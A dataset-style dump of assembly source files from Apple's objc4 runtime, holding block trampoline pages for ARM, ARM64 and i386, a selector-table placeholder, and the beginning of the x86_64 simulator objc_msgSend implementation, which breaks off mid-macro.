repo_id stringlengths 5 115 | size int64 590 5.01M | file_path stringlengths 4 212 | content stringlengths 590 5.01M |
|---|---|---|---|
opensource-apple/objc4 | 2,300 | runtime/a1a2-blocktramps-arm64.s | #if __arm64__
#include <mach/vm_param.h>
.text
.private_extern __a1a2_tramphead
.private_extern __a1a2_firsttramp
.private_extern __a1a2_trampend
// The trampoline code must start on its own page boundary: each
// trampoline's argument data lives exactly one page before its code
// (see TrampolineEntry below).
.align PAGE_MAX_SHIFT
__a1a2_tramphead:
L_a1a2_tramphead:
/*
x0 == self
x17 == address of called trampoline's data (1 page before its code)
lr == original return address
*/
// Shared dispatch: shift self into the _cmd slot, load the block object
// as the new self, then tail-call the block's invoke pointer (offset 16).
mov x1, x0 // _cmd = self
ldr x0, [x17] // self = block object
ldr x16, [x0, #16] // tail call block->invoke
br x16
// pad up to TrampolineBlockPagePair header size
nop
nop
// One trampoline = 2 instructions (8 bytes): compute this entry's data
// address, then branch to the shared head above.
.macro TrampolineEntry
// load address of trampoline data (one page before this instruction)
adr x17, -PAGE_MAX_SIZE
b L_a1a2_tramphead
.endmacro
.macro TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
.endmacro
.macro TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
.endmacro
.align 3
.private_extern __a1a2_firsttramp
__a1a2_firsttramp:
// 2048-3 trampolines to fill 16K page
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
// TrampolineEntry
// TrampolineEntry
// TrampolineEntry
.private_extern __a1a2_trampend
__a1a2_trampend:
#endif
|
opensource-apple/objc4 | 1,580 | runtime/objc-sel-table.s | #include <TargetConditionals.h>
#include <mach/vm_param.h>
// PTR() emits a pointer-sized value: 8 bytes under LP64, 4 otherwise.
#if __LP64__
# define PTR(x) .quad x
#else
# define PTR(x) .long x
#endif
.section __TEXT,__objc_opt_ro
.align 3
.private_extern __objc_opt_data
__objc_opt_data:
// Optimization-table header: version number plus three table offsets.
// NOTE(review): the zero-filled .space regions below presumably get
// rewritten with real selector/class/protocol tables when the dyld
// shared cache is built — confirm against the cache builder before
// relying on this layout.
.long 13 /* table.version */
.long 0 /* table.selopt_offset */
.long 0 /* table.headeropt_offset */
.long 0 /* table.clsopt_offset */
.space PAGE_MAX_SIZE-16
/* space for selopt, smax/capacity=262144, blen/mask=262143+1 */
.space 262144 /* mask tab */
.space 524288 /* checkbytes */
.space 524288*4 /* offsets */
/* space for clsopt, smax/capacity=32768, blen/mask=16383+1 */
.space 16384 /* mask tab */
.space 32768 /* checkbytes */
.space 32768*12 /* offsets to name and class and header_info */
.space PAGE_MAX_SIZE /* some duplicate classes */
/* space for protocolopt, smax/capacity=8192, blen/mask=4095+1 */
.space 4096 /* mask tab */
.space 8192 /* checkbytes */
.space 8192*4 /* offsets */
.section __DATA,__objc_opt_rw
.align 3
.private_extern __objc_opt_rw_data
__objc_opt_rw_data:
/* space for header_info structures */
.space 32768
/* space for 8192 protocols */
#if __LP64__
.space 8192 * 11 * 8
#else
.space 8192 * 11 * 4
#endif
/* section of pointers that the shared cache optimizer wants to know about */
.section __DATA,__objc_opt_ptrs
.align 3
#if TARGET_OS_MAC && !TARGET_OS_IPHONE && __i386__
// old ABI
.globl .objc_class_name_Protocol
PTR(.objc_class_name_Protocol)
#else
// new ABI
.globl _OBJC_CLASS_$_Protocol
PTR(_OBJC_CLASS_$_Protocol)
#endif
|
opensource-apple/objc4 | 2,536 | runtime/a2a3-blocktramps-arm.s | #if __arm__
#include <arm/arch.h>
#include <mach/vm_param.h>
.syntax unified
.text
.private_extern __a2a3_tramphead
.private_extern __a2a3_firsttramp
.private_extern __a2a3_trampend
// Trampoline machinery assumes the trampolines are Thumb function pointers
#if !__thumb2__
# error sorry
#endif
.thumb
.thumb_func __a2a3_tramphead
.thumb_func __a2a3_firsttramp
.thumb_func __a2a3_trampend
// The head must sit on a page boundary: each trampoline's argument data
// lives exactly one page before its code.
.align PAGE_MAX_SHIFT
__a2a3_tramphead:
/*
r1 == self
r12 == pc of trampoline's first instruction + PC bias
lr == original return address
*/
// Shift self into the _cmd slot, load the block object as the new self,
// then tail-call the block's invoke pointer (offset 12).
mov r2, r1 // _cmd = self
// Trampoline's data is one page before the trampoline text.
// Also correct PC bias of 4 bytes.
sub r12, #PAGE_MAX_SIZE
ldr r1, [r12, #-4] // self = block object
ldr pc, [r1, #12] // tail call block->invoke
// not reached
// Align trampolines to 8 bytes
.align 3
// One trampoline = 8 bytes: capture pc (this entry's address plus the
// 4-byte Thumb PC bias) in r12, then branch to the shared head above.
.macro TrampolineEntry
mov r12, pc
b __a2a3_tramphead
.align 3
.endmacro
.macro TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
.endmacro
.macro TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
.endmacro
.private_extern __a2a3_firsttramp
__a2a3_firsttramp:
// 2048-2 trampolines to fill 16K page
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
// TrampolineEntry
// TrampolineEntry
.private_extern __a2a3_trampend
__a2a3_trampend:
#endif
|
opensource-apple/objc4 | 11,799 | runtime/a2a3-blocktramps-i386.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#ifdef __i386__
#include <mach/vm_param.h>
.text
.private_extern __a2a3_tramphead
.private_extern __a2a3_firsttramp
.private_extern __a2a3_nexttramp
.private_extern __a2a3_trampend
// The head must sit on a page boundary: each trampoline's argument data
// lives exactly one page before its code.
.align PAGE_SHIFT
__a2a3_tramphead:
popl %eax // eax = return address pushed by TrampolineEntry's call
andl $0xFFFFFFF8, %eax // round down to this trampoline's 8-byte slot
subl $ PAGE_SIZE, %eax // data page is one page before the code page
movl 8(%esp), %ecx // self -> ecx
movl %ecx, 12(%esp) // ecx -> _cmd
movl (%eax), %ecx // blockPtr -> ecx
movl %ecx, 8(%esp) // ecx -> self
jmp *12(%ecx) // tail to block->invoke
// One trampoline = 8 bytes: a 5-byte near call plus 3 nops of padding,
// so the pushed return address rounded down to 8 identifies the entry.
.macro TrampolineEntry
call __a2a3_tramphead
nop
nop
nop
.endmacro
.align 5
__a2a3_firsttramp:
TrampolineEntry
__a2a3_nexttramp:
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
__a2a3_trampend:
#endif
|
opensource-apple/objc4 | 2,536 | runtime/a1a2-blocktramps-arm.s | #if __arm__
#include <arm/arch.h>
#include <mach/vm_param.h>
.syntax unified
.text
.private_extern __a1a2_tramphead
.private_extern __a1a2_firsttramp
.private_extern __a1a2_trampend
// Trampoline machinery assumes the trampolines are Thumb function pointers
#if !__thumb2__
# error sorry
#endif
.thumb
.thumb_func __a1a2_tramphead
.thumb_func __a1a2_firsttramp
.thumb_func __a1a2_trampend
// The head must sit on a page boundary: each trampoline's argument data
// lives exactly one page before its code.
.align PAGE_MAX_SHIFT
__a1a2_tramphead:
/*
r0 == self
r12 == pc of trampoline's first instruction + PC bias
lr == original return address
*/
// Shift self into the _cmd slot, load the block object as the new self,
// then tail-call the block's invoke pointer (offset 12).
mov r1, r0 // _cmd = self
// Trampoline's data is one page before the trampoline text.
// Also correct PC bias of 4 bytes.
sub r12, #PAGE_MAX_SIZE
ldr r0, [r12, #-4] // self = block object
ldr pc, [r0, #12] // tail call block->invoke
// not reached
// Align trampolines to 8 bytes
.align 3
// One trampoline = 8 bytes: capture pc (this entry's address plus the
// 4-byte Thumb PC bias) in r12, then branch to the shared head above.
.macro TrampolineEntry
mov r12, pc
b __a1a2_tramphead
.align 3
.endmacro
.macro TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
.endmacro
.macro TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
.endmacro
.private_extern __a1a2_firsttramp
__a1a2_firsttramp:
// 2048-2 trampolines to fill 16K page
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
// TrampolineEntry
// TrampolineEntry
.private_extern __a1a2_trampend
__a1a2_trampend:
#endif
|
opensource-apple/objc4 | 25,750 | runtime/Messengers.subproj/objc-msg-simulator-x86_64.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if __x86_64__ && TARGET_IPHONE_SIMULATOR
/********************************************************************
********************************************************************
**
** objc-msg-x86_64.s - x86-64 code to support objc messaging.
**
********************************************************************
********************************************************************/
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected.
.align 4
.private_extern _objc_entryPoints
_objc_entryPoints:
.quad _cache_getImp
.quad _objc_msgSend
.quad _objc_msgSend_fpret
.quad _objc_msgSend_fp2ret
.quad _objc_msgSend_stret
.quad _objc_msgSendSuper
.quad _objc_msgSendSuper_stret
.quad _objc_msgSendSuper2
.quad _objc_msgSendSuper2_stret
.quad 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.quad LExit_cache_getImp
.quad LExit_objc_msgSend
.quad LExit_objc_msgSend_fpret
.quad LExit_objc_msgSend_fp2ret
.quad LExit_objc_msgSend_stret
.quad LExit_objc_msgSendSuper
.quad LExit_objc_msgSendSuper_stret
.quad LExit_objc_msgSendSuper2
.quad LExit_objc_msgSendSuper2_stret
.quad 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad NIL_EXIT
.text
.endmacro
/********************************************************************
* Recommended multi-byte NOP instructions
* (Intel 64 and IA-32 Architectures Software Developer's Manual Volume 2B)
********************************************************************/
#define nop1 .byte 0x90
#define nop2 .byte 0x66,0x90
#define nop3 .byte 0x0F,0x1F,0x00
#define nop4 .byte 0x0F,0x1F,0x40,0x00
#define nop5 .byte 0x0F,0x1F,0x44,0x00,0x00
#define nop6 .byte 0x66,0x0F,0x1F,0x44,0x00,0x00
#define nop7 .byte 0x0F,0x1F,0x80,0x00,0x00,0x00,0x00
#define nop8 .byte 0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
#define nop9 .byte 0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
/********************************************************************
* Names for parameter registers.
********************************************************************/
#define a1 rdi
#define a1d edi
#define a1b dil
#define a2 rsi
#define a2d esi
#define a2b sil
#define a3 rdx
#define a3d edx
#define a4 rcx
#define a4d ecx
#define a5 r8
#define a5d r8d
#define a6 r9
#define a6d r9d
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 6: 7: 8: 9:
********************************************************************/
#define LCacheMiss 6
#define LCacheMiss_f 6f
#define LCacheMiss_b 6b
#define LGetIsaDone 7
#define LGetIsaDone_f 7f
#define LGetIsaDone_b 7b
#define LNilOrTagged 8
#define LNilOrTagged_f 8f
#define LNilOrTagged_b 8b
#define LNil 9
#define LNil_f 9f
#define LNil_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
#define NORMAL 0
#define FPRET 1
#define FP2RET 2
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER_STRET 6
#define SUPER2 7
#define SUPER2_STRET 8
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
// objc_super parameter to sendSuper
#define receiver 0
#define class 8
// Selected field offsets in class structure
// #define isa 0 USE GetIsa INSTEAD
// Method descriptor
#define method_name 0
#define method_imp 16
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY
.text
.globl $0
.align 6, 0x90
$0:
.cfi_startproc
.endmacro
.macro STATIC_ENTRY
.text
.private_extern $0
.align 2, 0x90
$0:
.cfi_startproc
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY
.cfi_endproc
LExit$0:
.endmacro
/////////////////////////////////////////////////////////////////////
//
// SaveRegisters
//
// Pushes a stack frame and saves all registers that might contain
// parameter values.
//
// On entry:
// stack = ret
//
// On exit:
// %rsp is 16-byte aligned
//
/////////////////////////////////////////////////////////////////////
.macro SaveRegisters
// Build a frame and spill every register that may carry a parameter:
// rax (vector-arg count for variadic calls), integer args a1-a6, and
// xmm0-xmm7.
push %rbp
.cfi_def_cfa_offset 16
.cfi_offset rbp, -16
mov %rsp, %rbp
.cfi_def_cfa_register rbp
sub $$0x80+8, %rsp // +8 for alignment
// The xmm stores interleave with the pushes. The 0x88 subtraction plus
// the 7 pushes below leave %rsp 16-byte aligned, as documented above.
movdqa %xmm0, -0x80(%rbp)
push %rax // might be xmm parameter count
movdqa %xmm1, -0x70(%rbp)
push %a1
movdqa %xmm2, -0x60(%rbp)
push %a2
movdqa %xmm3, -0x50(%rbp)
push %a3
movdqa %xmm4, -0x40(%rbp)
push %a4
movdqa %xmm5, -0x30(%rbp)
push %a5
movdqa %xmm6, -0x20(%rbp)
push %a6
movdqa %xmm7, -0x10(%rbp)
.endmacro
/////////////////////////////////////////////////////////////////////
//
// RestoreRegisters
//
// Pops a stack frame pushed by SaveRegisters
//
// On entry:
// %rbp unchanged since SaveRegisters
//
// On exit:
// stack = ret
//
/////////////////////////////////////////////////////////////////////
.macro RestoreRegisters
movdqa -0x80(%rbp), %xmm0
pop %a6
movdqa -0x70(%rbp), %xmm1
pop %a5
movdqa -0x60(%rbp), %xmm2
pop %a4
movdqa -0x50(%rbp), %xmm3
pop %a3
movdqa -0x40(%rbp), %xmm4
pop %a2
movdqa -0x30(%rbp), %xmm5
pop %a1
movdqa -0x20(%rbp), %xmm6
pop %rax
movdqa -0x10(%rbp), %xmm7
leave
.cfi_def_cfa rsp, 8
.cfi_same_value rbp
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type, caller
//
// Locate the implementation for a class in a selector's method cache.
//
// Takes:
// $0 = NORMAL, FPRET, FP2RET, STRET, SUPER, SUPER_STRET, SUPER2, SUPER2_STRET, GETIMP
// a2 or a3 (STRET) = selector a.k.a. cache
// r11 = class to search
//
// On exit: r10 clobbered
// (found) calls or returns IMP, eq/ne/r11 set for forwarding
// (not found) jumps to LCacheMiss, class still in r11
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
// CacheHit must always be preceded by a not-taken `jne` instruction
// in order to set the correct flags for _objc_msgForward_impcache.
// r10 = found bucket
.if $0 == GETIMP
movq 8(%r10), %rax // return imp
leaq __objc_msgSend_uncached_impcache(%rip), %r11
cmpq %rax, %r11
jne 4f
